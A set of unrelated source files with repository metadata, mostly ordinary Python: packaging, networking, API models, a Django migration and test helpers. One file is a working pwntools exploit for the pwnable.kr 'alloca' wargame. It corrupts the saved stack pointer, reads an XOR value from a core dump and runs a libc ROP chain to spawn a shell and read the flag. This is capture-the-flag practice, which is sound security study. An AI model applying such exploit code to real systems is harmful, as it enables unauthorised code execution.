98d538aa3e13f57f02758656ffa7977463977e5a
|
refs/heads/master
| 2022-12-16T07:13:11.767383
| 2020-09-17T14:07:37
| 2020-09-17T14:07:37
| 197,921,346
| 6
| 3
| null | 2020-05-25T01:26:51
| 2019-07-20T11:29:55
|
Python
|
UTF-8
|
Python
| false
| false
| 748
|
py
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#############################################
# File Name: setup.py
# Author: junius
# Mail: junius.zhou@gmail.com
# Created Time: 2019-07-20 19:17:34
#############################################

# Packaging metadata for the substrate-python-api distribution.
from setuptools import setup, find_packages

setup(
    name="substrate-python-api",
    version="0.0.2",
    keywords=("pip", "substrate", "api"),
    description="python api for substrate",
    long_description="python api for substrate",
    license="MIT Licence",
    # Bug fix: URL previously pointed at the misspelled
    # ".../substrate-pyton-api"; the repository is "substrate-python-api".
    url="https://github.com/juniuszhou/substrate-python-api",
    author="junius",
    author_email="junius.zhou@gmail.com",
    packages=find_packages(),
    include_package_data=True,
    platforms="any",
    install_requires=[]  # no runtime dependencies declared
)
|
[
"junius.zhou@gmail.com"
] |
junius.zhou@gmail.com
|
74c2347b9150e15dbbe69fe6dce4493a8258841f
|
b424c3262c9eacf8dd4230019eba7e05a9b95461
|
/.history/ndn_hello_sender_20200530012537.py
|
a9866ad3bbc9dcd7f10b5fa74fed00e9084ad214
|
[] |
no_license
|
leonerii/aer_tp
|
30e47f29bcda69512718a6279a7cad32e9a01b14
|
d8f46b188b5be9f315dd155ed147880ce7dce169
|
refs/heads/master
| 2022-09-30T03:27:24.375971
| 2020-06-04T14:23:16
| 2020-06-04T14:23:16
| 245,219,806
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,802
|
py
|
from threading import Thread, RLock
from time import sleep
from json import dumps
from uuid import uuid4
import socket
class HelloSender(Thread):
    """Background thread that periodically multicasts an NDN "HELLO" message
    advertising the local Content Store, plus FIB entries that have no next
    hop yet.

    Fixes vs. the original (a mid-edit snapshot from `.history/`):
    - removed a dangling ``csdata =`` line that was a syntax error;
    - ``dict_keys`` is not JSON-serialisable, so the CS keys are sent as a
      plain list;
    - ``e.with_traceback()`` requires a traceback argument and raised inside
      the handler; the exception is now just formatted.
    """

    def __init__(self, lock, hello_interval, fib, cs, localhost, mcast_group, mcast_port):
        Thread.__init__(self)
        self.lock = lock  # guards shared access to fib/cs
        self.hello_interval = hello_interval  # seconds between HELLOs
        self.localhost = localhost
        self.mcast_group = mcast_group
        self.mcast_port = mcast_port
        self.fib = fib # Forwarding Information Base
        self.cs = cs # Content Store

    def run(self):
        # Send one HELLO per interval, holding the lock while reading fib/cs.
        while True:
            try:
                self.lock.acquire()
                self.ndn_hello_sender()
            except Exception as e:
                print('Failed: {}'.format(e))
            finally:
                self.lock.release()
            sleep(self.hello_interval)

    def ndn_hello_sender(self):
        '''
        Send a "HELLO" message with the Content Store information used to
        build the FIB.  (Translated from the original Portuguese docstring.)
        '''
        try:
            client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
            # Hello message to be sent — only when the Content Store has data.
            if self.cs:
                self.msg = {
                    "type": "HELLO",
                    #"source": self.localhost
                    "data": list(self.cs.keys())
                }
                # Piggyback FIB entries that still lack a next hop.
                for key, value in self.fib.items():
                    if value['next_hop'] is None:
                        self.msg[key] = value['timestamp']
                client_sock.sendto(dumps(self.msg).encode('utf-8'), (self.mcast_group,self.mcast_port))
        except socket.gaierror as socket_error:
            print('Sending error: {}'.format(socket_error))
        finally:
            client_sock.close()
|
[
"aseie@Adrianos-MBP.lan"
] |
aseie@Adrianos-MBP.lan
|
10a74a89df0e005033f9a0040c90b46da278a520
|
e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7
|
/flask_api/venv/lib/python3.7/site-packages/vsts/member_entitlement_management/v4_1/models/user_entitlement_operation_reference.py
|
0e8a8c4903319844a6245687d671b999ccabee76
|
[
"MIT"
] |
permissive
|
u-blavins/secret_sasquatch_society
|
c36993c738ab29a6a4879bfbeb78a5803f4f2a57
|
0214eadcdfa9b40254e331a6617c50b422212f4c
|
refs/heads/master
| 2020-08-14T00:39:52.948272
| 2020-01-22T13:54:58
| 2020-01-22T13:54:58
| 215,058,646
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,307
|
py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .operation_reference import OperationReference
class UserEntitlementOperationReference(OperationReference):
    """UserEntitlementOperationReference.

    :param id: Unique identifier for the operation.
    :type id: str
    :param plugin_id: Unique identifier for the plugin.
    :type plugin_id: str
    :param status: The current status of the operation.
    :type status: object
    :param url: URL to get the full operation object.
    :type url: str
    :param completed: Operation completed with success or failure.
    :type completed: bool
    :param have_results_succeeded: True if all operations were successful.
    :type have_results_succeeded: bool
    :param results: List of results for each operation.
    :type results: list of :class:`UserEntitlementOperationResult <member-entitlement-management.v4_1.models.UserEntitlementOperationResult>`
    """

    # Maps Python attribute names to wire-format keys/types — presumably the
    # msrest-style serialization convention used across this client; confirm.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'plugin_id': {'key': 'pluginId', 'type': 'str'},
        'status': {'key': 'status', 'type': 'object'},
        'url': {'key': 'url', 'type': 'str'},
        'completed': {'key': 'completed', 'type': 'bool'},
        'have_results_succeeded': {'key': 'haveResultsSucceeded', 'type': 'bool'},
        'results': {'key': 'results', 'type': '[UserEntitlementOperationResult]'}
    }

    def __init__(self, id=None, plugin_id=None, status=None, url=None, completed=None, have_results_succeeded=None, results=None):
        # Base reference fields are forwarded to the parent; the extra
        # result-tracking fields are stored on this subclass.
        super(UserEntitlementOperationReference, self).__init__(id=id, plugin_id=plugin_id, status=status, url=url)
        self.completed = completed
        self.have_results_succeeded = have_results_succeeded
        self.results = results
|
[
"usama.blavins1@gmail.com"
] |
usama.blavins1@gmail.com
|
225b6d5941ba617b3affab3562256f853598178b
|
c15a28ae62eb94dbf3ed13e2065195e572a9988e
|
/Cook book/src/9/defining_a_decorator_with_user_adjustable_attributes/example2.py
|
36d1bb206aabac56e5e7fba7acecdad70229e638
|
[] |
no_license
|
xuyuchends1/python
|
10798c92840a1a59d50f5dc5738b2881e65f7865
|
545d950a3d2fee799902658e8133e3692939496b
|
refs/heads/master
| 2021-01-25T07:07:04.812140
| 2020-02-28T09:25:15
| 2020-02-28T09:25:15
| 93,647,064
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
# Alternate formulation using function attributes directly
from functools import wraps
import logging
def logged(level, name=None, message=None):
    """Decorator factory that logs a message each time the function is called.

    ``level`` is the logging level; ``name`` is the logger name and
    ``message`` the log message, defaulting to the decorated function's
    module and name.  The level, logger and message are exposed as
    attributes on the wrapper so callers can adjust them after decoration.
    """
    def decorate(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            # Read through the wrapper attributes (not the closure) so that
            # reassigning wrapper.level/logmsg/log later takes effect.
            wrapper.log.log(wrapper.level, wrapper.logmsg)
            return func(*args, **kwargs)

        # Seed the adjustable attributes from the factory arguments.
        wrapper.level = level
        wrapper.logmsg = message if message else func.__name__
        wrapper.log = logging.getLogger(name if name else func.__module__)
        return wrapper

    return decorate
# Example use
@logged(logging.DEBUG)
def add(x, y):
    return x + y

@logged(logging.CRITICAL, 'example')
def spam():
    print('Spam!')

if __name__ == '__main__':
    # Demonstrate adjusting the attached attributes after decoration.
    import logging
    logging.basicConfig(level=logging.DEBUG)
    print(add(2, 3))
    # Change the log message
    add.logmsg = 'Add called'
    print(add(2, 3))
    # Change the log level
    add.level = logging.WARNING
    print(add(2, 3))
|
[
"xuyuchends@163.com"
] |
xuyuchends@163.com
|
dbd5cecff92cba1fcf35215102752961f33b4718
|
ce74ed4ad6834168b81d6ec5e53c80935f247fe1
|
/python-wrapper/normalizer.py
|
260c4e083f822c223ff64a447d4b415a33455417
|
[] |
no_license
|
chenghuige/melt
|
6b6984243c71a85ec343cfaa67a66e3d1b48c180
|
d2646ffe84eabab464b4bef6b31d218abdbf6ce5
|
refs/heads/master
| 2021-01-25T16:46:57.567890
| 2017-08-26T04:30:13
| 2017-08-26T04:30:13
| 101,304,210
| 6
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,386
|
py
|
import os
import sys
import glob
from pyplusplus import module_builder
# Build script: generates Boost.Python binding code for the Normalizer
# component with pyplusplus + gccxml. Running this module writes
# '<name>_py.cc' into the current directory.
root = '/home/users/chenghuige/rsc/'
name = 'normalizer'
# Symbols passed to gccxml; the headers use them in #ifdef guards.
#define_symbols = ['GCCXML','PYTHON_WRAPPER','NO_BAIDU_DEP']
define_symbols = ['GCCXML','PYTHON_WRAPPER']
# Headers whose declarations are exposed to Python.
files = [
    './gezi.include.python/common_util.h',
    './gezi.include.python/log_util.h',
    './include.python/Prediction/Normalization/Normalizer.h',
    './include.python/Prediction/Normalization/NormalizerFactory.h',
    './gezi.include.python/Numeric/Vector/Vector.h',
]
# Optional header directories to scan wholesale (currently disabled).
paths = [
    #'./gezi.include.python/Numeric/Vector/',
    #'./include.python/MLCore/',
    #'./include.python/Prediction/Instances/',
]
#import gezi
#for path in paths:
# files += [f for f in gezi.get_filepaths(path) if f.endswith('.h')]
# Include roots relative to `root`; '/include' is appended below.
include_paths=[
    'third-64/glog',
    'third-64/gflags',
    'third-64/gtest',
    'third-64/boost.1.53',
    'lib2-64/bsl',
    'lib2-64/postag',
    'lib2-64/dict',
    'lib2-64/libcrf',
    'lib2-64/others-ex',
    'lib2-64/ullib',
    'lib2-64/ccode',
    'public/odict/output',
    'public/uconv/output',
    'public/configure/output',
    'app/search/sep/anti-spam/gezi/third/rabit',
]
# Roots that get '/include.python' appended instead.
include_paths_python = [
    'app/search/sep/anti-spam/melt/python-wrapper',
]
# Roots used verbatim (no suffix appended).
include_paths_obsolute = [
    'app/search/sep/anti-spam/melt/python-wrapper/gezi.include.python',
    'lib2-64/wordseg',
    'public/comlog-plugin',
    'app/search/sep/anti-spam/gezi/third',
]
# Parse the headers and build the binding-code model.
mb = module_builder.module_builder_t(
    gccxml_path = '~/.jumbo/bin/gccxml',
    define_symbols = define_symbols,
    files = files,
    include_paths = [root + f + '/include' for f in include_paths]
    + [root + f + '/include.python' for f in include_paths_python]
    + [root + f for f in include_paths_obsolute]
)
# Emit the generated Boost.Python source next to this script.
mb.build_code_creator( module_name='lib%s'%name )
mb.code_creator.user_defined_directories.append( os.path.abspath('.') )
mb.write_module( os.path.join( os.path.abspath('./'), '%s_py.cc'%name) )
|
[
"chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97"
] |
chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97
|
071cd8751ab4d3c34048353a7eaa7e15171d75b1
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Facebook/Actions/Fitness/Walks/UpdateWalk.py
|
493e93d6dc4ff63b1d782b571214053924414cfc
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100
| 2014-10-14T18:58:00
| 2014-10-14T18:58:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,177
|
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# UpdateWalk
# Updates an existing walk action.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class UpdateWalk(Choreography):
    # Generated Temboo Choreo wrapper for Facebook's "update walk action"
    # endpoint; the base class handles execution against the Temboo API.
    def __init__(self, temboo_session):
        """
        Create a new instance of the UpdateWalk Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        Choreography.__init__(self, temboo_session, '/Library/Facebook/Actions/Fitness/Walks/UpdateWalk')
    def new_input_set(self):
        """Return an empty input set for this Choreo."""
        return UpdateWalkInputSet()
    def _make_result_set(self, result, path):
        """Wrap a raw execution result in the Choreo-specific result set."""
        return UpdateWalkResultSet(result, path)
    def _make_execution(self, session, exec_id, path):
        """Wrap an in-flight execution in the Choreo-specific handle."""
        return UpdateWalkChoreographyExecution(session, exec_id, path)
class UpdateWalkInputSet(InputSet):
    """
    Collects the inputs for the UpdateWalk Choreo. Populate it with the
    setters below, then pass it to the Choreo's execute call.
    """
    def set_AccessToken(self, value):
        """AccessToken -- (required, string) The access token retrieved from the final step of the OAuth process."""
        self._set_input('AccessToken', value)
    def set_ActionID(self, value):
        """ActionID -- (required, string) The id of the action to update."""
        self._set_input('ActionID', value)
    def set_Course(self, value):
        """Course -- (optional, string) The URL or ID for an Open Graph object representing the course."""
        self._set_input('Course', value)
    def set_EndTime(self, value):
        """EndTime -- (optional, date) The time that the user ended the action (e.g. 2013-06-24T18:53:35+0000)."""
        self._set_input('EndTime', value)
    def set_ExpiresIn(self, value):
        """ExpiresIn -- (optional, integer) The amount of time (in milliseconds) from the publish_time that the action will expire."""
        self._set_input('ExpiresIn', value)
    def set_Message(self, value):
        """Message -- (optional, string) A message attached to this action. Setting this parameter requires enabling of message capabilities."""
        self._set_input('Message', value)
    def set_Place(self, value):
        """Place -- (optional, string) The URL or ID for an Open Graph object representing the location associated with this action."""
        self._set_input('Place', value)
    def set_Tags(self, value):
        """Tags -- (optional, string) A comma separated list of other profile IDs that also performed this action."""
        self._set_input('Tags', value)
class UpdateWalkResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the UpdateWalk Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """
    def getJSONFromString(self, str):
        # Parse a JSON payload string into Python objects.
        # NOTE(review): the parameter name shadows the builtin `str`;
        # renaming it would change this generated API, so it is left as-is.
        return json.loads(str)
    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook.)
        """
        return self._output.get('Response', None)
class UpdateWalkChoreographyExecution(ChoreographyExecution):
    # Handle for an asynchronous UpdateWalk execution; only result-set
    # construction is specialized here.
    def _make_result_set(self, response, path):
        """Wrap the raw response in the Choreo-specific result set."""
        return UpdateWalkResultSet(response, path)
|
[
"dattasaurabh82@gmail.com"
] |
dattasaurabh82@gmail.com
|
0e5c2f08572df65160cf0040294875735675b65c
|
ce78a21f86faf0b9783b4cbc1df1fc562e80a2d8
|
/Public/problem/D1/2070.큰놈,작은놈,같은놈.py
|
94f01b7703da6229722d2d9bd4b809bf0e98293d
|
[] |
no_license
|
jongjunpark/TIL
|
18961c6518f78c8e3d80677f39caf32c727c5beb
|
28f4d83e28851aac2dee4e77321543f1c811cc83
|
refs/heads/master
| 2023-03-17T01:45:51.867005
| 2022-10-31T10:44:05
| 2022-10-31T10:44:05
| 245,943,735
| 1
| 0
| null | 2023-03-05T17:15:39
| 2020-03-09T04:28:06
|
Python
|
UTF-8
|
Python
| false
| false
| 260
|
py
|
# Read a number of test cases; for each, compare two integers and print
# "#<case> >", "#<case> =" or "#<case> <" accordingly.
case_count = int(input())
for case_no in range(1, case_count + 1):
    values = [int(token) for token in input().split()]
    # Pick the comparison symbol for the first two values on the line.
    if values[0] > values[1]:
        symbol = ">"
    elif values[0] == values[1]:
        symbol = "="
    else:
        symbol = "<"
    print("#{} {}".format(case_no, symbol))
|
[
"poiufgin7373@naver.com"
] |
poiufgin7373@naver.com
|
bfd1700ad0198fea64886e0f2aa06687748976c6
|
4979df3343d7b99a9a826bd1cb946ae79fac260c
|
/tests/test_runner.py
|
1ecd57ab36aa321d2148d96008b681ff168fcb63
|
[
"BSD-3-Clause"
] |
permissive
|
e-calder/enaml
|
753ff329fb8a2192bddbe7166581ed530fb270be
|
8f02a3c1a80c0a6930508551c7de1d345095173d
|
refs/heads/master
| 2021-07-30T01:18:29.222672
| 2021-07-27T08:51:50
| 2021-07-27T08:51:50
| 206,089,494
| 0
| 0
|
NOASSERTION
| 2019-09-03T13:52:44
| 2019-09-03T13:52:44
| null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
import os
import sys
import pytest
from utils import enaml_run
from enaml.application import Application, deferred_call
from enaml.runner import main
@pytest.fixture
def sys_argv():
    """ Fixture that saves sys.argv and restores it after the test completes
    """
    # Keep a reference to the original argv so the test can freely rebind
    # sys.argv; the finally-block restores it even when the test fails.
    argv = sys.argv
    try:
        yield
    finally:
        sys.argv = argv
def test_runner(enaml_run, sys_argv):
    """Test invoking the runner application.
    """
    # Point enaml-run at a bundled example file; the enaml_run fixture
    # (from utils) keeps main() from blocking on a real GUI event loop,
    # and sys_argv restores the original argv afterwards.
    dir_path = os.path.abspath(os.path.split(os.path.dirname(__file__))[0])
    sys.argv = ['enaml-run',
                os.path.join(dir_path,
                             'examples', 'stdlib', 'mapped_view.enaml')]
    main()
|
[
"marul@laposte.net"
] |
marul@laposte.net
|
2df3f8b7738ac707606738926f6e0f3cb24f0154
|
4fc1d1097ac124d0dcbb9c1e574efec5c38105d8
|
/staff/migrations/0001_initial.py
|
90b968534d808291b151eba7b45cc526e3b91f5a
|
[] |
no_license
|
lilianwaweru/management
|
077d3261e1f8bd5d6c84a0b40edd28249410279f
|
e71bd0b67266ca8715605574e52c81137a66eaeb
|
refs/heads/master
| 2020-12-23T14:09:49.630171
| 2020-03-02T12:34:06
| 2020-03-02T12:34:06
| 237,173,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
# Generated by Django 3.0.3 on 2020-03-02 11:14
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration for the staff app: no dependencies, creates the
    # Work table. Auto-generated by `makemigrations`; field names must
    # stay in sync with the Work model.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Work',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Personal details and government registration numbers.
                ('image', models.ImageField(blank=True, upload_to='images/')),
                ('first_name', models.CharField(max_length=30)),
                ('other_names', models.CharField(max_length=30)),
                ('department', models.CharField(max_length=30)),
                ('employee_number', models.IntegerField()),
                ('identification_number', models.IntegerField()),
                ('nssf_number', models.IntegerField()),
                ('nhif_number', models.IntegerField()),
                ('date_of_birth', models.DateField()),
                ('employee_position', models.CharField(max_length=30)),
                # Education history.
                # NOTE(review): 'secondary_shool' is misspelled, but fixing it
                # requires a model rename plus a follow-up migration.
                ('secondary_shool', models.CharField(max_length=100)),
                ('higher_education', models.CharField(max_length=100)),
                ('level_of_education', models.CharField(max_length=100)),
                ('course', models.CharField(max_length=100)),
                ('other_certificates', models.CharField(max_length=100)),
                # Previous employment record.
                ('company', models.CharField(max_length=100)),
                ('position', models.CharField(max_length=100)),
                ('duration', models.IntegerField()),
                ('tasks', models.CharField(max_length=1000)),
            ],
        ),
    ]
|
[
"lilowesh.lw@gmail.com"
] |
lilowesh.lw@gmail.com
|
e328cc4ddbb881174b91f93521be7d3e5d87ce0a
|
15b7a9708d6fb6f9ae5ac55830f996c629468910
|
/ch06/Ex6_16.py
|
686602d686c015c0a9a4d929a1940e73303da2f7
|
[] |
no_license
|
Anancha/Python_Bible
|
81dfab4ebe7f74c46615403cbd8a37b714b84df1
|
d9569abf2ad60393289fcec22b81340a19e28601
|
refs/heads/main
| 2023-09-03T00:52:58.249183
| 2021-11-12T07:57:56
| 2021-11-12T07:57:56
| 415,224,243
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 665
|
py
|
# Demonstrates tuple length, indexing (positive and negative), slicing,
# and concatenation with two sample tuples of shape names.
shape_tuple1 = ("square","circle","triangle","rectangle","star")
shape_tuple2 = ("heart","oval")
print("shape_tuple1 = ",shape_tuple1)
print("shape_tuple2 = ",shape_tuple2)
length = len(shape_tuple1)
# Fixed label: this line prints the tuple's length, not the tuple itself
# (it previously read "shape_tuple1 = ", which was misleading).
print("length of shape_tuple1 = ",length)
# Indexing: 0-based from the front, -1-based from the back.
print("shape_tuple1[0] = ",shape_tuple1[0])
print("shape_tuple1[4] = ",shape_tuple1[4])
print("shape_tuple1[-5] = ",shape_tuple1[-5])
print("shape_tuple1[-1] = ",shape_tuple1[-1])
# Slicing: the stop index is exclusive; omitted bounds default to the ends.
print("shape_tuple1[0:5] = ",shape_tuple1[0:5])
print("shape_tuple1[:5] = ",shape_tuple1[:5])
print("shape_tuple1[-4:] = ",shape_tuple1[-4:])
# Concatenation builds a brand-new tuple; the operands are unchanged.
shape_tuple = shape_tuple1 + shape_tuple2
print("combine tuple1 and tuple2 = ",shape_tuple)
|
[
"noreply@github.com"
] |
Anancha.noreply@github.com
|
699eda9c9fa27436875646f3e48e3a68b554030c
|
94923becbb06260e3cd35dde46c3d1688c9f7feb
|
/wargames/pwnablekr/rookiss/alloca/win.py
|
b41641d53ba295cd19ff532a9f6708165421a956
|
[
"MIT"
] |
permissive
|
infernalheaven/examples
|
b1826d521b04ea5bf55c7c2b5a6cc620df59cfe9
|
a3a3bfe2a7b9addea94396f21b73252c3bd56d49
|
refs/heads/master
| 2021-01-11T10:58:10.794931
| 2016-10-05T22:56:39
| 2016-10-05T22:56:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,582
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# Exploit for the pwnable.kr "alloca" challenge (Python 2 / pwntools).
# Strategy: a negative alloca() size lets us overwrite the saved ESP; the
# saved value gets XORed with stack trash, so we deliberately crash once,
# scrape the XOR constant from the corefile, then pivot into a libc ROP
# chain that runs execve("/bin/sh").
host = 'pwnable.kr'
user = 'alloca'
password = 'guest'
binary = '/home/%s/%s' % (user,user)
chal = os.path.basename(binary)
shell = ssh(host=host, user=user, password=password, port=2222)
# Cache the challenge binary and its source locally on first run.
if not os.path.exists(chal):
    shell.download_file(binary)
    shell.download_file(binary + '.c')
    os.chmod(chal, 0755)
#
# Disable ASLR so that DSO addresses are constant.
#
context.aslr = False
#
# Using a negative value for alloca allows us to overwrite the saved value
# of ESP on the stack.
#
# The offset which gives us this control is -92, though -88 through -96 also
# work.
#
# Because of the way things work out, the stack value will be XORed with
# some random stack trash. On the up-side, it is consistent from run-to-run.
# On the downside, it is not consistent between different versions of libc.
#
# In order to have a portable exploit (works locally and remotely), we will
# force the target binary to crash once, and scrape the value of ESP at the
# segfault by loading a corefile.
#
# In order for a corefile to drop, we have to be in a writable directory
shell.set_working_directory()
shell('ln -s %s .' % binary)
#
# Launch the process, and let it die a terrible death
#
# Note that we need the setuid bit to be ignored in order for a corefile we
# can use to be dropped.
#
p = shell.process('./alloca',
                  setuid=0)
# Marker stack value; its XORed counterpart is recovered from the core.
address = 0xdeadbeef
cookie = str(signed(address))
pattern = cyclic(64)
data = fit({0: '-92',
            16: cookie,
            32: pattern},
           filler='\n')
#
# All of the data should be sent at the same time, so that it is all
# buffered at once. The fgets() is actually a noop since the value is negative.
#
# We are relying on the buffering behavior of scanf().
#
p.sendline(data)
p.recvall()
# Grab the corefile after it's written. It may take a second or two to appear.
pause(2)
shell.download('core')
core = Core('core')
# We want to be sure that we crashed at the 'ret'
# Either we'll crash at that instruction (stack pointer is invalid)
# or at zero (stack pointer was valid, pointed at an empty page).
assert core.eip in (0x804878a, 0)
# Find out the XOR value. This is almost-always constant, but varies by 1 bit
# on the pwnable.kr server as of writing. Luckily, the 1 bit that changes is
# the '4' bit, so as long as we pad an extra 'ret' in our ROP, we're fine.
xor = address ^ core.esp
log.info("%08x xor magic" % xor)
# Find our data in the heap
address = core.search(pattern).next()
log.info("%08x heap address" % address)
#
# We need a bit of a RET sled because the XOR value isn't perfectly constant,
# but only varies by a small amount which we can account for.
#
libc = p.libc
rop = ROP(libc)
log.info("libc is at %#x" % libc.address)
binsh = libc.search('/bin/sh\x00').next()
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.raw(rop.ret)
rop.execve(binsh,0,0)
log.info(rop.dump())
# Shoot for the middle of the RET sled
address += 8
# One very last time, to pwn it proper!
cookie = str(signed(address ^ xor))
data = fit({0: '-92',
            16: cookie,
            32: str(rop)},
           filler='\n')
p = shell.process('./alloca')
# shell.upload('~/bin/gdbserver')
# shell('chmod +x gdbserver')
# p = gdb.debug('./alloca', '''
# break *0x804878a
# set follow-fork-mode child
# catch exec
# continue
# ''', ssh=shell)
p.sendline(data)
p.recvuntil('$')
p.clean()
# With a shell on the target, read out the flag.
p.sendline('cat /home/alloca/flag')
flag = p.recvline().strip()
log.success('Flag: %r' % flag)
p.interactive(prompt='')
|
[
"riggle@google.com"
] |
riggle@google.com
|
95c8d89866be1ab21e245c5c39170e3918f41ece
|
78c4ccb183a99ebaabcdc3a3a69f029e4aee0f5c
|
/AlgorithmStudy/백준/무지성 랜덤풀이/9월/9.27/13549 숨바꼭질3.py
|
e0e130cd47181bea752f97e6b07942782346f798
|
[] |
no_license
|
cladren123/study
|
ef2c45bc489fa658dbc9360fb0b0de53250500e5
|
241326e618f1f3bb1568d588bf6f53b78920587a
|
refs/heads/master
| 2023-09-02T02:21:24.560967
| 2021-11-05T12:20:06
| 2021-11-05T12:20:06
| 368,753,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,339
|
py
|
"""
Problem tags:
    graph theory
    graph traversal
    breadth-first search
    Dijkstra
    0-1 breadth-first search

A plain BFS exceeded the time limit; clamping positions to the valid
range and discarding out-of-range moves resolved it.
"""
import sys
from collections import deque
input = sys.stdin.readline
# n: starting position (Subin), m: target position (the sibling)
n, m = map(int, input().split())
# Exclusive upper bound on any position
maxnum = 100001
# timelist[x]: earliest time to reach position x (-1 while unreached)
timelist = [-1] * maxnum
# visited[x]: 1 once position x has been queued
visited = [0] * maxnum
# Seeding the start state matters -> omitting it breaks the search
que = deque()
que.append(n)
timelist[n] = 0
visited[n] = 1
while que :
    loc = que.popleft()
    # The *2 move costs no time, so explore it first: 0-1 BFS pushes
    # zero-cost edges onto the FRONT of the deque.
    if loc*2 < maxnum and visited[loc*2] == 0 :
        timelist[loc*2] = timelist[loc]
        visited[loc*2] = 1
        que.appendleft(loc*2)
    # The +1 move costs one second
    if loc+1 < maxnum and visited[loc+1] == 0 :
        visited[loc+1] = 1
        timelist[loc+1] = timelist[loc] + 1
        que.append(loc+1)
    # The -1 move costs one second
    if loc-1 >= 0 and visited[loc-1] == 0 :
        visited[loc-1] = 1
        timelist[loc-1] = timelist[loc] + 1
        que.append(loc-1)
print(timelist[m])
|
[
"48821942+cladren123@users.noreply.github.com"
] |
48821942+cladren123@users.noreply.github.com
|
c87601687dd5c7c65e20dba92b239e070261b317
|
3670f46666214ef5e1ce6765e47b24758f3614a9
|
/oneflow/python/test/onnx/util.py
|
d2222f7d6b30cad257fa79d950b134ab33ead31c
|
[
"Apache-2.0"
] |
permissive
|
ashing-zhang/oneflow
|
0b8bb478ccd6cabea2dca0864defddab231919bf
|
70db228a4d361c916f8f8d85e908795b479e5d20
|
refs/heads/master
| 2022-12-14T21:13:46.752535
| 2020-09-07T03:08:52
| 2020-09-07T03:08:52
| 293,535,931
| 1
| 0
|
Apache-2.0
| 2020-09-07T13:28:25
| 2020-09-07T13:28:24
| null |
UTF-8
|
Python
| false
| false
| 2,994
|
py
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
import oneflow as flow
import onnxruntime as ort
import onnx
from collections import OrderedDict
import tempfile
import os
import shutil
def convert_to_onnx_and_check(
    job_func,
    print_outlier=False,
    explicit_init=True,
    external_data=False,
    ort_optimize=True,
    opset=None,
):
    """Export a OneFlow job function to ONNX and check numerical parity.

    Saves the job's weights, exports it via flow.onnx.export, feeds the
    same random inputs to both ONNX Runtime and OneFlow, and asserts the
    outputs agree within rtol=1e-2 / atol=1e-5.

    Args:
        job_func: OneFlow global function to export and execute.
        print_outlier: if True, print each element pair that exceeds the
            tolerance before the final assertion fires.
        explicit_init: create a dummy variable and run CheckPoint.init()
            up front (works around check_point.save() hanging when the
            job has no variables).
        external_data: store ONNX weights as external data files.
        ort_optimize: enable ONNX Runtime graph optimizations.
        opset: ONNX opset version to export with (None = exporter default).
    """
    check_point = flow.train.CheckPoint()
    if explicit_init:
        # it is a trick to keep check_point.save() from hanging when there is no variable
        @flow.global_function(flow.FunctionConfig())
        def add_var():
            return flow.get_variable(
                name="trick",
                shape=(1,),
                dtype=flow.float,
                initializer=flow.random_uniform_initializer(),
            )
        check_point.init()
    flow_weight_dir = tempfile.TemporaryDirectory()
    check_point.save(flow_weight_dir.name)
    # TODO(daquexian): a more elegant way?
    # Busy-wait until the snapshot marker file shows the save completed.
    while not os.path.exists(os.path.join(flow_weight_dir.name, "snapshot_done")):
        pass
    onnx_model_dir = tempfile.TemporaryDirectory()
    onnx_model_path = os.path.join(onnx_model_dir.name, "model.onnx")
    flow.onnx.export(
        job_func,
        flow_weight_dir.name,
        onnx_model_path,
        opset=opset,
        external_data=external_data,
    )
    flow_weight_dir.cleanup()
    ort_sess_opt = ort.SessionOptions()
    ort_sess_opt.graph_optimization_level = (
